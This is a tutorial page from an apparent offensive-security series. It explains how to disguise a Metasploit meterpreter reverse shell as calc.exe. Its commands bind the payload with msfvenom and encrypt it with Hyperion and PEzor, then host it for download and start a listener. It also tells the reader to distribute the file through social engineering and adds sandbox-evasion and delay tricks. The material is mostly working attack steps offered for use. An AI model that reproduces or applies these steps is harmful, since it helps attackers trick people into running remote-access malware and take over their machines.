Skip to content

13. Metasploit Wrapping Payload Inside a Legitimate Executable

Let's enhance the stealth of the Python loader by wrapping it inside a legitimate executable while maintaining its functionality. This technique masks the malicious payload as a benign application.

Scenario

We will:

  1. Obfuscate the Python loader by compiling it.
  2. Combine it with a legitimate executable to avoid suspicion.

1. Prepare the Benign Executable

Choose a Legitimate File

Select a small and harmless executable, such as a calculator application (calc.exe).

2. Obfuscate the Python Loader

Compile the Python loader into an executable:

  1. Install pyinstaller:

    pip install pyinstaller

  2. Compile the loader:

    pyinstaller --onefile --noconsole loader.py
    • --onefile: Packages everything into a single file.
    • --noconsole: Suppresses the console window.

    Output: dist/loader.exe

3. Combine Loader and Benign Executable

We will bind calc.exe with loader.exe using a payload binder.

Option 1: Using msfvenom

Bind the two executables together:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -x calc.exe -k -f exe -o final_payload.exe
  • -x calc.exe: Specifies the benign executable.
  • -k: Ensures the original functionality of calc.exe remains intact.
  • -f exe: Output format is an executable.
  • -o final_payload.exe: Output file name.

4. Advanced Obfuscation with Tools

For more stealth, use advanced tools like Hyperion or PEzor.

Option 2: Hyperion

Hyperion encrypts the payload and decrypts it in memory during execution.

  1. Install Hyperion:

    • Clone the repository:

      git clone https://github.com/nullsecuritynet/tools
cd tools/hyperion

    • Compile:

      i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe

  2. Encrypt the Payload:

    wine hyperion.exe loader.exe final_payload.exe

5. Deploy the Combined Payload

  1. Host the file on a server:

    python3 -m http.server 8080

  2. Use social engineering to distribute the file to the target.

6. Set Up Listener

On the attacker's machine:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
exploit

7. Execute the Payload on the Target

  1. Download the file on the target system:

    curl http://192.168.1.10:8080/final_payload.exe -o final_payload.exe

  2. Run the payload:

    final_payload.exe

    The legitimate calc.exe opens, while the malicious loader.exe executes in the background.

8. Optional: Further Obfuscate with PEzor

  1. Download and install PEzor:

    git clone https://github.com/phra/PEzor.git
cd PEzor
./PEzor.sh -h

  2. Use PEzor to further obfuscate the final_payload.exe:

    ./PEzor.sh final_payload.exe

Tips for Enhanced Stealth

  1. Code Customization:

    • Randomize variable names in the Python loader to avoid signature detection.
    • Add benign functionality like opening a decoy document or image.
    • Time-delayed Execution: Add a delay before executing the payload to avoid immediate detection:
    import time
time.sleep(10)  # Delay execution by 10 seconds

  2. Environment Checks: Check for sandbox or virtual machine environments before running the payload:

    import os
if "VirtualBox" in os.popen("systeminfo").read():
    exit()